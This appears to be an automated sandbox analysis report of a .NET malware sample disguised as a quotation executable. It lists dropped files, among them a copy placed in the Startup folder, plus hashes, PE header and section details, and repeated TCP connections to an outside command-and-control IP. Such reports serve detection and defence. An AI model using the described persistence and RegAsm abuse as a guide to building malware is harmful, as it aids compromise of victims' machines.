Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....]._................................. ... ....@.. ....................................@.................................D...W.... ..N............................................................................ ............... ..H............text........ ...................... ..`.rsrc...N.... ......................@..@.reloc..............................@..B........................H.......pc..............q..............................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....B...(.....o....&2.(....t.....(....&2.t....o....F~....~....(.........(.....(.........(....(.........(....(....o.........&...o.....(.....(.....r/..p.....6..{b...(^.....o.....{a...{c....{b...oZ...(^....so....p.....oq...V.{....od....(...+...J.{....o1....ov...*J

C:\Users\user\AppData\Roaming\7redfg:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:tccgt:ttgt
MD5:	D47A6CEF4DA0DC89FA704BAE78647F81
SHA1:	E938FA778A75E957E694F7BBE15A8EAA0B0B96EA
SHA-256:	5C74BB1765AD749D734E7096ABA5C913996CAB20EC42EB3637F8C8DACEA9BDD1
SHA-512:	4D9E7F9E56C3F7CFB64EEDD5078ECF762FEF4093493ECC54290395EC3DF64453E603537DC57246A819CF7A8A5C5D2E007D7455ACAEB894A3D4C4ABE1048D33B6
Malicious:	true
Reputation:	low
Preview:	K..yy..H

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	56
Entropy (8bit):	4.823079645651109
Encrypted:	false
SSDEEP:	3:oMty8WddSWAnPL4A:oMLW6WAnPL4A
MD5:	743A1D76D284D8E42E19061A3F13A723
SHA1:	D6BBE641CBAC7B46C0922F32DCC89F8F5B87F98C
SHA-256:	86093BF03032ACFCEF934A0D8363B66AAF4ADEE58015DA0172E13635B1DD1FE8
SHA-512:	DF687DCD985D1F6127624220083DFD93A39FEBCE02A869F4126787DF3724890ECC10FF18077BFDEF02FCC802440F3F83545E4DA4BD826DC84E59B26A105F6567
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HJdyTuap.exe Download File
Process:	C:\Users\user\Desktop\Quotation ATB-PR28500KINH.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1024000
Entropy (8bit):	6.739426849800377
Encrypted:	false
SSDEEP:	24576:MbHvzJzELhKXqKNxNTmV3s03o1+pUfOA:MzzJYLhKlpmV3s6o1UUfP
MD5:	E8989A1CE5543A7E4693DD416A46BE22
SHA1:	FD0B198079671C3D6C6B01802B9240E8EF80475B
SHA-256:	676AE550EFF3F5D6E6520604EDD804C606213EB2C5B8B93D449309BEA9B09CC0
SHA-512:	F3B7F5F8723B3CDAA47D2B1E53B7E96275E3CD9888F37D05D9C654873E3EC434F21140C3E1986FF519EEA5F962C028B0777F10019329C1BC524CAFFA79FD4CCD
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....]._................................. ... ....@.. ....................................@.................................D...W.... ..N............................................................................ ............... ..H............text........ ...................... ..`.rsrc...N.... ......................@..@.reloc..............................@..B........................H.......pc..............q..............................................a.b.d.c.e.f.g.h.i.j.k.l.m.n.p.r.q.s.t.u.v.w.z.y.x.0.1.2.3.4.5.6.7.8.9.A.B.C.D.E.F.G.H.I.J.K.L.M.N.Q.P.R.T.S.V.U.W.X.Y.Z.6..(....o....B...(.....o....&2.(....t.....(....&2.t....o....F~....~....(.........(.....(.........(....(.........(....(....o.........&...o.....(.....(.....r/..p.....6..{b...(^.....o.....{a...{c....{b...oZ...(^....so....p.....oq...V.{....od....(...+...J.{....o1....ov...*J

\Device\ConDrv Download File
Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	275
Entropy (8bit):	4.839531074781769
Encrypted:	false
SSDEEP:	6:z30qJ5tUI+30qobtUmYRZBXVNYL0dxKaRFfnYJin:z30mc30b4BFNY4xNYU
MD5:	1B648D405C15ECA8CF1B9B0469B5627E
SHA1:	C6BBAEDE7AE2353E15271F1FBAA18588BEF0E922
SHA-256:	52FF7329D9E47BF7366892E79338FEE702C60D1F3ADB2EDDB601DFAEC8F170A0
SHA-512:	086EC3F608C80CDB6DC844366CFBBA5237ABCEB5306C0EF7C91600003F1A169CD94EB07D3680E943C9AC498CBA3845857756C5D745A66999BE78C263E5C4405F
Malicious:	false
Preview:	Microsoft .NET Framework Assembly Registration Utility version 4.7.3056.0..for Microsoft .NET Framework version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....RegAsm : error RA0000 : Unable to locate input assembly '0' or one of its dependencies...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.746514435463881
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	Quotation ATB-PR28500KINH.exe
File size:	1020416
MD5:	ddb5d5410477cd3855a1f542112808c0
SHA1:	5fc06ec885cafa6e8f955651b9e2115b705b2b4d
SHA256:	9f76f4b990ce938d48b11501ad00d99795b172b44b1f94ea7ca3a26ceb64c1d5
SHA512:	e9c60cc1c03d40c7c45c53fc5a78f1e8b801572a0fdde422fbf8f80bcc8eee89c023c48398a15d388275cf6589f6baab42e511933acad3b3c94cbe4b3d1f819b
SSDEEP:	24576:MbHvzJzELhKXqKNxNTmV3s03o1+pUfOA:MzzJYLhKlpmV3s6o1UUfP
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....]._................................. ... ....@.. ....................................@................................

File Icon


Icon Hash:	905ada12e9cc368b

Static PE Info

General
Entrypoint:	0x4a039e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5FB75DD0 [Fri Nov 20 06:10:24 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa0344	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xa2000	0x5a94e	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfe000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x9e3a4	0x9e400	False	0.921722267476	data	7.86314578381	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0xa2000	0x5a94e	0x5aa00	False	0.0372737068966	data	2.71520754372	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfe000	0xc	0x200	False	0.044921875	data	0.0815394123432	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xa21d8	0x42028	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0xe4200	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0xe4668	0x25a8	dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 2699173413, next used block 2699173413	English	United States
RT_ICON	0xe6c10	0x10a8	dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 3236110116, next used block 3236110116	English	United States
RT_ICON	0xe7cb8	0x10828	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0xf84e0	0x4228	dBase IV DBT of \200.DBF, blocks size 0, block length 16384, next free block index 40, next free block 2162368036, next used block 2162368036	English	United States
RT_GROUP_ICON	0xfc708	0x5a	data	English	United States
RT_MANIFEST	0xfc764	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 09:26:56.135529041 CET	49725	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:26:56.161993980 CET	6184	49725	185.140.53.139	192.168.2.7
Nov 20, 2020 09:26:56.667889118 CET	49725	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:26:56.694283962 CET	6184	49725	185.140.53.139	192.168.2.7
Nov 20, 2020 09:26:57.198714972 CET	49725	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:26:57.224991083 CET	6184	49725	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:02.588973999 CET	49727	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:02.615282059 CET	6184	49727	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:03.121628046 CET	49727	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:03.148569107 CET	6184	49727	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:03.652827978 CET	49727	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:03.679325104 CET	6184	49727	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:07.725398064 CET	49730	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:07.751748085 CET	6184	49730	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:08.262631893 CET	49730	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:08.288739920 CET	6184	49730	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:08.793904066 CET	49730	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:08.820143938 CET	6184	49730	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:12.901868105 CET	49731	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:12.930203915 CET	6184	49731	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:13.434906960 CET	49731	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:13.463443995 CET	6184	49731	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:13.974385977 CET	49731	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:14.003876925 CET	6184	49731	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:18.046519995 CET	49732	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:18.072860003 CET	6184	49732	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:18.701004982 CET	49732	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:18.727283001 CET	6184	49732	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:19.310412884 CET	49732	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:19.336898088 CET	6184	49732	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:23.383054972 CET	49733	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:23.410958052 CET	6184	49733	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:23.920149088 CET	49733	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:23.948600054 CET	6184	49733	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:24.451509953 CET	49733	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:24.478183985 CET	6184	49733	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:28.548549891 CET	49736	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:28.574753046 CET	6184	49736	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:29.093298912 CET	49736	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:29.120059013 CET	6184	49736	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:29.655231953 CET	49736	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:29.681921959 CET	6184	49736	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:33.734447002 CET	49738	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:33.760849953 CET	6184	49738	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:34.277954102 CET	49738	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:34.304286003 CET	6184	49738	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:34.983653069 CET	49738	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:35.009541035 CET	6184	49738	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:39.057404995 CET	49749	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:39.083404064 CET	6184	49749	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:39.593693018 CET	49749	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:39.619728088 CET	6184	49749	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:40.296585083 CET	49749	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:40.324564934 CET	6184	49749	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:44.412208080 CET	49755	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:44.438590050 CET	6184	49755	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:45.093842030 CET	49755	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:45.119945049 CET	6184	49755	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:45.797017097 CET	49755	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:45.823246956 CET	6184	49755	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:50.218314886 CET	49756	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:50.244765043 CET	6184	49756	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:50.859947920 CET	49756	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:50.886248112 CET	6184	49756	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:51.547516108 CET	49756	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:51.574143887 CET	6184	49756	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:55.622875929 CET	49757	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:55.649090052 CET	6184	49757	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:56.297931910 CET	49757	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:56.324323893 CET	6184	49757	185.140.53.139	192.168.2.7
Nov 20, 2020 09:27:56.891716957 CET	49757	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:27:56.918060064 CET	6184	49757	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:00.992399931 CET	49758	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:01.018563032 CET	6184	49758	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:01.532746077 CET	49758	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:01.558955908 CET	6184	49758	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:02.063973904 CET	49758	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:02.090981960 CET	6184	49758	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:06.137979984 CET	49759	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:06.163880110 CET	6184	49759	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:06.673902035 CET	49759	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:06.699908972 CET	6184	49759	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:07.205127954 CET	49759	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:07.231425047 CET	6184	49759	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:11.280884981 CET	49760	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:11.307646036 CET	6184	49760	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:11.816543102 CET	49760	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:11.842854023 CET	6184	49760	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:12.346164942 CET	49760	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:12.372693062 CET	6184	49760	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:16.456875086 CET	49763	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:16.485682011 CET	6184	49763	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:16.987375975 CET	49763	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:17.013942957 CET	6184	49763	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:17.521506071 CET	49763	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:17.548383951 CET	6184	49763	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:21.605441093 CET	49764	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:21.632688046 CET	6184	49764	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:22.143814087 CET	49764	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:22.170222044 CET	6184	49764	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:22.675225019 CET	49764	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:22.701632023 CET	6184	49764	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:26.750308990 CET	49765	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:29.738226891 CET	49765	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:29.765033960 CET	6184	49765	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:30.269628048 CET	49765	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:30.295941114 CET	6184	49765	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:34.375529051 CET	49766	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:34.401880026 CET	6184	49766	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:34.910480976 CET	49766	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:34.936532974 CET	6184	49766	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:35.441844940 CET	49766	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:35.468215942 CET	6184	49766	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:39.516057014 CET	49767	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:39.542412043 CET	6184	49767	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:40.051701069 CET	49767	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:40.078103065 CET	6184	49767	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:40.582858086 CET	49767	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:40.609098911 CET	6184	49767	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:44.654021025 CET	49768	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:44.682840109 CET	6184	49768	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:45.192600965 CET	49768	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:45.218830109 CET	6184	49768	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:45.723860025 CET	49768	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:45.749948978 CET	6184	49768	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:49.793342113 CET	49769	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:49.819464922 CET	6184	49769	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:50.335818052 CET	49769	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:50.362070084 CET	6184	49769	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:50.868622065 CET	49769	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:50.894905090 CET	6184	49769	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:55.091336966 CET	49770	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:55.117465973 CET	6184	49770	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:55.646591902 CET	49770	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:55.672914982 CET	6184	49770	185.140.53.139	192.168.2.7
Nov 20, 2020 09:28:56.178016901 CET	49770	6184	192.168.2.7	185.140.53.139
Nov 20, 2020 09:28:56.204307079 CET	6184	49770	185.140.53.139	192.168.2.7

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 20, 2020 09:26:35.912642002 CET	58052	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:35.939836979 CET	53	58052	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:36.980882883 CET	54008	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:37.007913113 CET	53	54008	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:38.436265945 CET	59451	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:38.463397026 CET	53	59451	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:39.522572994 CET	52914	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:39.549721956 CET	53	52914	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:40.618621111 CET	64569	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:40.645675898 CET	53	64569	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:41.769871950 CET	52816	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:41.798651934 CET	53	52816	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:42.877338886 CET	50781	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:42.912965059 CET	53	50781	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:44.836189985 CET	54230	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:44.863204002 CET	53	54230	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:45.893138885 CET	54911	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:45.920321941 CET	53	54911	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:46.935808897 CET	49958	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:46.962971926 CET	53	49958	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:48.047569990 CET	50860	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:48.074825048 CET	53	50860	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:49.102062941 CET	50452	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:49.129266977 CET	53	50452	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:50.216165066 CET	59730	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:50.243244886 CET	53	59730	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:51.362644911 CET	59310	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:51.389772892 CET	53	59310	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:56.079119921 CET	51919	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:56.116950035 CET	53	51919	8.8.8.8	192.168.2.7
Nov 20, 2020 09:26:58.627288103 CET	64296	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:26:58.678628922 CET	53	64296	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:02.549174070 CET	56680	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:02.586632013 CET	53	56680	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:04.589431047 CET	58820	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:04.616455078 CET	53	58820	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:07.688446045 CET	60983	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:07.723908901 CET	53	60983	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:12.862723112 CET	49247	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:12.900499105 CET	53	49247	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:18.017364979 CET	52286	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:18.044465065 CET	53	52286	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:23.346471071 CET	56064	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:23.381779909 CET	53	56064	8.8.8.8	192.168.2.7
Nov 20, 2020 09:27:25.628304958 CET	63744	53	192.168.2.7	8.8.8.8
Nov 20, 2020 09:27:25.655551910 CET	53	63744	8.8.8.8	192.168.2.7
